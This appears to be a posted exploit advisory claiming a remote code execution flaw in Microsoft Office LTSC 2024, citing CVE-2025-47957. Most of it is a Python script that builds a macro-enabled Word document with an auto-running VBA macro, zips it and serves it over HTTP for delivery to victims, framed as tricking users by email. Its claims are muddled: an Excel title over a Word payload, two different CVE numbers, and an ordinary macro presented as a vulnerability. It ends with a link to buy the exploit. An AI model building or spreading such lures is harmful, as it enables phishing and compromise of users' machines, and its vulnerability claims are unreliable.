# Titles: Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)
# Author: nu11secur1ty
# Date: 06/16/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751
# CVE-2025-47957
# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise
## Description:
The attacker can trick any user into opening and executing their code by
sending a malicious DOCX file via email or a streaming server. After the
execution of the victim, his machine can be infected or even worse than
ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE
MACROS OPTIONS FROM YOUR OFFICE 365!!!
STATUS: HIGH-CRITICAL Vulnerability
[+]Exploit:
```
#!/usr/bin/python
# CVE-2025-47957 by nu11secur1ty
import os
import time
import zipfile
import threading
import http.server
import socket
import socketserver
import win32com.client
def get_local_ip():
"""Get the LAN IP address of the current machine."""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80)) # External DNS, just for routing
ip = s.getsockname()[0]
s.close()
return ip
except:
return "127.0.0.1"
def create_docm_with_auto_macro(filename):
script_dir = os.path.dirname(os.path.abspath(__file__))
full_path = os.path.join(script_dir, filename)
word = win32com.client.Dispatch("Word.Application")
word.Visible = False
doc = word.Documents.Add()
doc.Content.Text = "This document contains an auto-starting macro."
vbproject = doc.VBProject
vbcomponent = vbproject.VBComponents.Add(1) # Standard Module
macro_code = '''
Sub AutoOpen()
Call YOUR_PoC
End Sub
Sub YOUR_PoC()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "YOUR_EXPLOIT_HERE"
TaskID = YOUR_TASK_HERE
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub
'''
vbcomponent.CodeModule.AddFromString(macro_code)
wdFormatXMLDocumentMacroEnabled = 13
doc.SaveAs(full_path, FileFormat=wdFormatXMLDocumentMacroEnabled)
doc.Close()
word.Quit()
print(f"[+] Macro-enabled .docm saved at: {full_path}")
return full_path
def compress_to_zip(filepath):
zip_path = filepath + '.zip'
with zipfile.ZipFile(zip_path, 'w') as zipf:
zipf.write(filepath, arcname=os.path.basename(filepath))
print(f"[+] Compressed to ZIP: {zip_path}")
return zip_path
def start_http_server(directory, port=8000):
os.chdir(directory)
handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", port), handler)
ip = get_local_ip()
print(f"[+] HTTP server running at: http://{ip}:{port}/")
thread = threading.Thread(target=httpd.serve_forever)
thread.daemon = True
thread.start()
return httpd
if __name__ == "__main__":
filename = "CVE-2025-47957.docm"
docm_path = create_docm_with_auto_macro(filename)
zip_path = compress_to_zip(docm_path)
server = start_http_server(os.path.dirname(docm_path))
try:
print("[*] Server running — press Ctrl+C to stop...")
while True:
time.sleep(1)
except KeyboardInterrupt:
print("\n[!] Ctrl+C detected — shutting down server...")
server.shutdown()
print("[+] The Exploit Server stopped. Goodbye!")
```
# Reproduce:
[href](https://www.youtube.com/watch?v=r4NsGrO56yo)
# Buy an exploit only:
[href](https://satoshidisk.com/pay/COeJqt)
# Time spent:
01:37:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
